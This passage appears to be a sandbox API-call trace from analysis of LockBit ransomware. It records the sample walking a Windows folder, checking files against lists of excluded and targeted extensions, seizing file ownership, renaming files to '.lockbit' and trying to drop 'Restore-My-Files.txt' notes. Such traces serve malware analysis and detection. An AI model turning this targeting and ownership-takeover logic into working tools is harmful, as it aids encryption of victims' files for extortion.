ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344c5c8*=0x3bc, IoStatusBlock=0x344c470*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0079.172] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0079.172] NtQueryInformationFile (in: FileHandle=0x3bc, IoStatusBlock=0x344c490, FileInformation=0x344c350, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344c490, FileInformation=0x344c350) returned 0x0 [0079.180] NtClose (Handle=0x3bc) returned 0x0 [0079.181] RtlFreeAnsiString (AnsiString="\\") [0079.181] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344c604 | out: TokenHandle=0x344c604*=0x3bc) returned 1 [0079.181] malloc (_Size=0x200) returned 0x53fcc0 [0079.181] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344c600 | out: TokenInformation=0x53fcc0, ReturnLength=0x344c600) returned 1 [0079.181] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344c5e8, dwRevision=0x1 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0079.181] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344c5e8, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0079.181] CloseHandle (hObject=0x3bc) returned 1 [0079.181] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui", SecurityInformation=0x1, pSecurityDescriptor=0x344c5e8) returned 1 [0079.181] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui", SecurityInformation=0x4, pSecurityDescriptor=0x344c5e8) returned 1 [0079.182] free (_Block=0x53fcc0) [0079.182] lstrcmpiW (lpString1=".mui", lpString2=".lockbit") returned 1 [0079.182] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mshwlatin.dll.mui"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mshwlatin.dll.mui.lockbit")) returned 1 [0079.183] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mshwlatin.dll.mui.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0079.183] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0079.183] malloc (_Size=0x40068) returned 0x20abae0 [0079.183] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x20abaf8 | out: lpFileSize=0x20abaf8*=2560) returned 1 [0079.183] ReadFile (in: hFile=0x3bc, lpBuffer=0x20abb14, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14*, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0) returned 1 [0079.185] GetLastError () returned 0x3e5 [0079.185] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US") returned 1 [0079.185] wsprintfW (in: param_1=0x344c3d8, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\Restore-My-Files.txt") returned 78 [0079.185] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.186] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeca1847, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xf901a42, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xeca1847, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="rtscom.dll.mui", cAlternateFileName="")) returned 1 [0079.186] lstrcmpiW (lpString1=".", lpString2="rtscom.dll.mui") returned -1 [0079.186] lstrcmpiW (lpString1="..", lpString2="rtscom.dll.mui") returned -1 [0079.186] PathFindExtensionW (pszPath="rtscom.dll.mui") returned=".mui" [0079.186] lstrcmpiW (lpString1=".386", lpString2=".mui") returned -1 [0079.186] lstrcmpiW (lpString1=".cmd", lpString2=".mui") returned -1 [0079.186] lstrcmpiW (lpString1=".exe", lpString2=".mui") returned -1 [0079.186] lstrcmpiW (lpString1=".ani", lpString2=".mui") returned -1 [0079.186] lstrcmpiW (lpString1=".adv", lpString2=".mui") returned -1 [0079.186] lstrcmpiW (lpString1=".theme", lpString2=".mui") returned 1 [0079.186] lstrcmpiW (lpString1=".msi", lpString2=".mui") returned -1 [0079.186] lstrcmpiW (lpString1=".msp", lpString2=".mui") returned -1 [0079.186] lstrcmpiW (lpString1=".com", lpString2=".mui") returned -1 [0079.186] lstrcmpiW (lpString1=".diagpkg", lpString2=".mui") returned -1 [0079.186] lstrcmpiW (lpString1=".nls", lpString2=".mui") returned 1 [0079.186] lstrcmpiW (lpString1=".diagcab", lpString2=".mui") returned -1 [0079.186] lstrcmpiW (lpString1=".lock", lpString2=".mui") returned -1 [0079.186] lstrcmpiW (lpString1=".ocx", lpString2=".mui") returned 1 [0079.186] lstrcmpiW (lpString1=".mpa", lpString2=".mui") returned -1 [0079.186] lstrcmpiW (lpString1=".cpl", lpString2=".mui") returned -1 [0079.186] lstrcmpiW (lpString1=".mod", lpString2=".mui") returned -1 [0079.186] lstrcmpiW (lpString1=".hta", lpString2=".mui") returned -1 [0079.186] lstrcmpiW (lpString1=".icns", lpString2=".mui") returned -1 [0079.186] lstrcmpiW (lpString1=".prf", lpString2=".mui") returned 1 [0079.187] lstrcmpiW (lpString1=".rtp", lpString2=".mui") returned 1 [0079.187] lstrcmpiW (lpString1=".diagcfg", lpString2=".mui") returned -1 [0079.187] lstrcmpiW (lpString1=".msstyles", lpString2=".mui") returned -1 [0079.187] lstrcmpiW (lpString1=".bin", lpString2=".mui") returned -1 [0079.187] lstrcmpiW (lpString1=".hlp", lpString2=".mui") returned -1 [0079.187] lstrcmpiW (lpString1=".shs", lpString2=".mui") returned 1 [0079.187] lstrcmpiW (lpString1=".drv", lpString2=".mui") returned -1 [0079.187] lstrcmpiW (lpString1=".wpx", lpString2=".mui") returned 1 [0079.187] lstrcmpiW (lpString1=".bat", lpString2=".mui") returned -1 [0079.187] lstrcmpiW (lpString1=".rom", lpString2=".mui") returned 1 [0079.187] lstrcmpiW (lpString1=".msc", lpString2=".mui") returned -1 [0079.187] lstrcmpiW (lpString1=".spl", lpString2=".mui") returned 1 [0079.187] lstrcmpiW (lpString1=".ps1", lpString2=".mui") returned 1 [0079.187] lstrcmpiW (lpString1=".msu", lpString2=".mui") returned -1 [0079.187] lstrcmpiW (lpString1=".ics", lpString2=".mui") returned -1 [0079.187] lstrcmpiW (lpString1=".key", lpString2=".mui") returned -1 [0079.187] lstrcmpiW (lpString1=".mp3", lpString2=".mui") returned -1 [0079.187] lstrcmpiW (lpString1=".reg", lpString2=".mui") returned 1 [0079.187] lstrcmpiW (lpString1=".dll", lpString2=".mui") returned -1 [0079.187] lstrcmpiW (lpString1=".ini", lpString2=".mui") returned -1 [0079.187] lstrcmpiW (lpString1=".idx", lpString2=".mui") returned -1 [0079.187] lstrcmpiW (lpString1=".sys", lpString2=".mui") returned 1 [0079.187] lstrcmpiW (lpString1=".hlp", lpString2=".mui") returned -1 [0079.187] lstrcmpiW (lpString1=".ico", lpString2=".mui") returned -1 [0079.187] lstrcmpiW (lpString1=".lnk", lpString2=".mui") returned -1 [0079.188] lstrcmpiW (lpString1=".rdp", lpString2=".mui") returned 1 [0079.188] wsprintfW (in: param_1=0x344ce80, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0079.188] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="rtscom.dll.mui") returned -1 [0079.188] lstrcmpiW (lpString1="ntldr", lpString2="rtscom.dll.mui") returned -1 [0079.188] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="rtscom.dll.mui") returned -1 [0079.188] lstrcmpiW (lpString1="bootsect.bak", lpString2="rtscom.dll.mui") returned -1 [0079.188] lstrcmpiW (lpString1="autorun.inf", lpString2="rtscom.dll.mui") returned -1 [0079.188] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\") returned="" [0079.188] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\rtscom.dll.mui") returned=".mui" [0079.188] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0079.188] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0079.188] lstrcmpiW (lpString1=".7z", lpString2=".mui") returned -1 [0079.188] lstrcmpiW (lpString1=".ckp", lpString2=".mui") returned -1 [0079.188] lstrcmpiW (lpString1=".dacpac", lpString2=".mui") returned -1 [0079.188] lstrcmpiW (lpString1=".db", lpString2=".mui") returned -1 [0079.188] lstrcmpiW (lpString1=".db-shm", lpString2=".mui") returned -1 [0079.188] lstrcmpiW (lpString1=".db-wal", lpString2=".mui") returned -1 [0079.188] lstrcmpiW (lpString1=".db3", lpString2=".mui") returned -1 [0079.188] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0079.188] lstrcmpiW (lpString1=".dbc", lpString2=".mui") returned -1 [0079.188] lstrcmpiW (lpString1=".dbs", lpString2=".mui") returned -1 [0079.188] lstrcmpiW (lpString1=".dbt", lpString2=".mui") returned -1 [0079.188] lstrcmpiW (lpString1=".dbv", lpString2=".mui") returned -1 [0079.188] lstrcmpiW (lpString1=".frm", lpString2=".mui") returned -1 [0079.189] lstrcmpiW (lpString1=".mdf", lpString2=".mui") returned -1 [0079.189] lstrcmpiW (lpString1=".mrg", lpString2=".mui") returned -1 [0079.189] lstrcmpiW (lpString1=".mwb", lpString2=".mui") returned 1 [0079.189] lstrcmpiW (lpString1=".myd", lpString2=".mui") returned 1 [0079.189] lstrcmpiW (lpString1=".ndf", lpString2=".mui") returned 1 [0079.189] lstrcmpiW (lpString1=".qry", lpString2=".mui") returned 1 [0079.189] lstrcmpiW (lpString1=".sdb", lpString2=".mui") returned 1 [0079.189] lstrcmpiW (lpString1=".sdf", lpString2=".mui") returned 1 [0079.189] lstrcmpiW (lpString1=".sql", lpString2=".mui") returned 1 [0079.189] lstrcmpiW (lpString1=".sqlite", lpString2=".mui") returned 1 [0079.189] lstrcmpiW (lpString1=".sqlite3", lpString2=".mui") returned 1 [0079.189] lstrcmpiW (lpString1=".sqlitedb", lpString2=".mui") returned 1 [0079.189] lstrcmpiW (lpString1=".tmd", lpString2=".mui") returned 1 [0079.189] wsprintfW (in: param_1=0x344c620, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\rtscom.dll.mui.lockbit") returned 80 [0079.189] lstrcmpiW (lpString1=".mui", lpString2=".lockbit") returned 1 [0079.189] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\rtscom.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\rtscom.dll.mui"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\rtscom.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\rtscom.dll.mui.lockbit")) returned 0 [0079.189] GetLastError () returned 0x5 [0079.190] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0079.190] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0079.190] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0079.190] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0079.191] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0079.191] NtOpenFile (in: FileHandle=0x344c5c8, DesiredAccess=0x80, ObjectAttributes=0x344c478*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\rtscom.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\rtscom.dll.mui"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344c470, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344c5c8*=0x3b4, IoStatusBlock=0x344c470*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0079.191] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0079.191] NtQueryInformationFile (in: FileHandle=0x3b4, IoStatusBlock=0x344c490, FileInformation=0x344c350, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344c490, FileInformation=0x344c350) returned 0x0 [0079.203] NtClose (Handle=0x3b4) returned 0x0 [0079.203] RtlFreeAnsiString (AnsiString="\\") [0079.203] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344c604 | out: TokenHandle=0x344c604*=0x3b4) returned 1 [0079.203] malloc (_Size=0x200) returned 0x53fcc0 [0079.203] GetTokenInformation (in: TokenHandle=0x3b4, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344c600 | out: TokenInformation=0x53fcc0, ReturnLength=0x344c600) returned 1 [0079.203] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344c5e8, dwRevision=0x1 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0079.203] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344c5e8, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0079.203] CloseHandle (hObject=0x3b4) returned 1 [0079.203] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\rtscom.dll.mui", SecurityInformation=0x1, pSecurityDescriptor=0x344c5e8) returned 1 [0079.204] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\rtscom.dll.mui", SecurityInformation=0x4, pSecurityDescriptor=0x344c5e8) returned 1 [0079.208] free (_Block=0x53fcc0) [0079.208] lstrcmpiW (lpString1=".mui", lpString2=".lockbit") returned 1 [0079.208] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\rtscom.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\rtscom.dll.mui"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\rtscom.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\rtscom.dll.mui.lockbit")) returned 1 [0079.209] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\rtscom.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\rtscom.dll.mui.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b4 [0079.209] CreateIoCompletionPort (FileHandle=0x3b4, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0079.209] malloc (_Size=0x40068) returned 0x3940048 [0079.209] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x3940060 | out: lpFileSize=0x3940060*=2560) returned 1 [0079.209] ReadFile (in: hFile=0x3b4, lpBuffer=0x394007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048) returned 0x0 [0079.211] GetLastError () returned 0x3e5 [0079.211] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\rtscom.dll.mui" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US") returned 1 [0079.211] wsprintfW (in: param_1=0x344c3d8, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\Restore-My-Files.txt") returned 78 [0079.211] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.211] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa00, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="ShapeCollector.exe.mui", cAlternateFileName="")) returned 1 [0079.211] lstrcmpiW (lpString1=".", lpString2="ShapeCollector.exe.mui") returned -1 [0079.211] lstrcmpiW (lpString1="..", lpString2="ShapeCollector.exe.mui") returned -1 [0079.212] PathFindExtensionW (pszPath="ShapeCollector.exe.mui") returned=".mui" [0079.212] lstrcmpiW (lpString1=".386", lpString2=".mui") returned -1 [0079.212] lstrcmpiW (lpString1=".cmd", lpString2=".mui") returned -1 [0079.212] lstrcmpiW (lpString1=".exe", lpString2=".mui") returned -1 [0079.212] lstrcmpiW (lpString1=".ani", lpString2=".mui") returned -1 [0079.212] lstrcmpiW (lpString1=".adv", lpString2=".mui") returned -1 [0079.212] lstrcmpiW (lpString1=".theme", lpString2=".mui") returned 1 [0079.212] lstrcmpiW (lpString1=".msi", lpString2=".mui") returned -1 [0079.212] lstrcmpiW (lpString1=".msp", lpString2=".mui") returned -1 [0079.212] lstrcmpiW (lpString1=".com", lpString2=".mui") returned -1 [0079.212] lstrcmpiW (lpString1=".diagpkg", lpString2=".mui") returned -1 [0079.212] lstrcmpiW (lpString1=".nls", lpString2=".mui") returned 1 [0079.212] lstrcmpiW (lpString1=".diagcab", lpString2=".mui") returned -1 [0079.212] lstrcmpiW (lpString1=".lock", lpString2=".mui") returned -1 [0079.212] lstrcmpiW (lpString1=".ocx", lpString2=".mui") returned 1 [0079.212] lstrcmpiW (lpString1=".mpa", lpString2=".mui") returned -1 [0079.212] lstrcmpiW (lpString1=".cpl", lpString2=".mui") returned -1 [0079.212] lstrcmpiW (lpString1=".mod", lpString2=".mui") returned -1 [0079.212] lstrcmpiW (lpString1=".hta", lpString2=".mui") returned -1 [0079.212] lstrcmpiW (lpString1=".icns", lpString2=".mui") returned -1 [0079.212] lstrcmpiW (lpString1=".prf", lpString2=".mui") returned 1 [0079.212] lstrcmpiW (lpString1=".rtp", lpString2=".mui") returned 1 [0079.213] lstrcmpiW (lpString1=".diagcfg", lpString2=".mui") returned -1 [0079.213] lstrcmpiW (lpString1=".msstyles", lpString2=".mui") returned -1 [0079.213] lstrcmpiW (lpString1=".bin", lpString2=".mui") returned -1 [0079.213] lstrcmpiW (lpString1=".hlp", lpString2=".mui") returned -1 [0079.213] lstrcmpiW (lpString1=".shs", lpString2=".mui") returned 1 [0079.213] lstrcmpiW (lpString1=".drv", lpString2=".mui") returned -1 [0079.213] lstrcmpiW (lpString1=".wpx", lpString2=".mui") returned 1 [0079.213] lstrcmpiW (lpString1=".bat", lpString2=".mui") returned -1 [0079.213] lstrcmpiW (lpString1=".rom", lpString2=".mui") returned 1 [0079.213] lstrcmpiW (lpString1=".msc", lpString2=".mui") returned -1 [0079.213] lstrcmpiW (lpString1=".spl", lpString2=".mui") returned 1 [0079.213] lstrcmpiW (lpString1=".ps1", lpString2=".mui") returned 1 [0079.213] lstrcmpiW (lpString1=".msu", lpString2=".mui") returned -1 [0079.213] lstrcmpiW (lpString1=".ics", lpString2=".mui") returned -1 [0079.213] lstrcmpiW (lpString1=".key", lpString2=".mui") returned -1 [0079.214] lstrcmpiW (lpString1=".mp3", lpString2=".mui") returned -1 [0079.214] lstrcmpiW (lpString1=".reg", lpString2=".mui") returned 1 [0079.214] lstrcmpiW (lpString1=".dll", lpString2=".mui") returned -1 [0079.214] lstrcmpiW (lpString1=".ini", lpString2=".mui") returned -1 [0079.214] lstrcmpiW (lpString1=".idx", lpString2=".mui") returned -1 [0079.214] lstrcmpiW (lpString1=".sys", lpString2=".mui") returned 1 [0079.214] lstrcmpiW (lpString1=".hlp", lpString2=".mui") returned -1 [0079.214] lstrcmpiW (lpString1=".ico", lpString2=".mui") returned -1 [0079.214] lstrcmpiW (lpString1=".lnk", lpString2=".mui") returned -1 [0079.214] lstrcmpiW (lpString1=".rdp", lpString2=".mui") returned 1 [0079.214] wsprintfW (in: param_1=0x344ce80, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0079.214] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="ShapeCollector.exe.mui") returned -1 [0079.214] lstrcmpiW (lpString1="ntldr", lpString2="ShapeCollector.exe.mui") returned -1 [0079.214] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="ShapeCollector.exe.mui") returned -1 [0079.214] lstrcmpiW (lpString1="bootsect.bak", lpString2="ShapeCollector.exe.mui") returned -1 [0079.214] lstrcmpiW (lpString1="autorun.inf", lpString2="ShapeCollector.exe.mui") returned -1 [0079.214] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\") returned="" [0079.214] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\ShapeCollector.exe.mui") returned=".mui" [0079.214] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0079.214] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0079.214] lstrcmpiW (lpString1=".7z", lpString2=".mui") returned -1 [0079.214] lstrcmpiW (lpString1=".ckp", lpString2=".mui") returned -1 [0079.214] lstrcmpiW (lpString1=".dacpac", lpString2=".mui") returned -1 [0079.214] lstrcmpiW (lpString1=".db", lpString2=".mui") returned -1 [0079.214] lstrcmpiW (lpString1=".db-shm", lpString2=".mui") returned -1 [0079.214] lstrcmpiW (lpString1=".db-wal", lpString2=".mui") returned -1 [0079.215] lstrcmpiW (lpString1=".db3", lpString2=".mui") returned -1 [0079.215] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0079.215] lstrcmpiW (lpString1=".dbc", lpString2=".mui") returned -1 [0079.215] lstrcmpiW (lpString1=".dbs", lpString2=".mui") returned -1 [0079.215] lstrcmpiW (lpString1=".dbt", lpString2=".mui") returned -1 [0079.215] lstrcmpiW (lpString1=".dbv", lpString2=".mui") returned -1 [0079.215] lstrcmpiW (lpString1=".frm", lpString2=".mui") returned -1 [0079.215] lstrcmpiW (lpString1=".mdf", lpString2=".mui") returned -1 [0079.215] lstrcmpiW (lpString1=".mrg", lpString2=".mui") returned -1 [0079.215] lstrcmpiW (lpString1=".mwb", lpString2=".mui") returned 1 [0079.215] lstrcmpiW (lpString1=".myd", lpString2=".mui") returned 1 [0079.215] lstrcmpiW (lpString1=".ndf", lpString2=".mui") returned 1 [0079.215] lstrcmpiW (lpString1=".qry", lpString2=".mui") returned 1 [0079.215] lstrcmpiW (lpString1=".sdb", lpString2=".mui") returned 1 [0079.215] lstrcmpiW (lpString1=".sdf", lpString2=".mui") returned 1 [0079.215] lstrcmpiW (lpString1=".sql", lpString2=".mui") returned 1 [0079.215] lstrcmpiW (lpString1=".sqlite", lpString2=".mui") returned 1 [0079.215] lstrcmpiW (lpString1=".sqlite3", lpString2=".mui") returned 1 [0079.215] lstrcmpiW (lpString1=".sqlitedb", lpString2=".mui") returned 1 [0079.215] lstrcmpiW (lpString1=".tmd", lpString2=".mui") returned 1 [0079.215] wsprintfW (in: param_1=0x344c620, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\ShapeCollector.exe.mui.lockbit") returned 88 [0079.215] lstrcmpiW (lpString1=".mui", lpString2=".lockbit") returned 1 [0079.215] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\ShapeCollector.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\shapecollector.exe.mui"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\ShapeCollector.exe.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\shapecollector.exe.mui.lockbit")) returned 0 [0079.216] GetLastError () returned 0x5 [0079.216] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0079.216] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0079.216] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0079.217] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0079.217] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0079.217] NtOpenFile (in: FileHandle=0x344c5c8, DesiredAccess=0x80, ObjectAttributes=0x344c478*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\ShapeCollector.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\shapecollector.exe.mui"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344c470, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344c5c8*=0x3b0, IoStatusBlock=0x344c470*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0079.218] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0079.218] NtQueryInformationFile (in: FileHandle=0x3b0, IoStatusBlock=0x344c490, FileInformation=0x344c350, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344c490, FileInformation=0x344c350) returned 0x0 [0079.230] NtClose (Handle=0x3b0) returned 0x0 [0079.230] RtlFreeAnsiString (AnsiString="\\") [0079.230] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344c604 | out: TokenHandle=0x344c604*=0x3b0) returned 1 [0079.230] malloc (_Size=0x200) returned 0x53fcc0 [0079.230] GetTokenInformation (in: TokenHandle=0x3b0, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344c600 | out: TokenInformation=0x53fcc0, ReturnLength=0x344c600) returned 1 [0079.230] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344c5e8, dwRevision=0x1 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0079.230] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344c5e8, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, 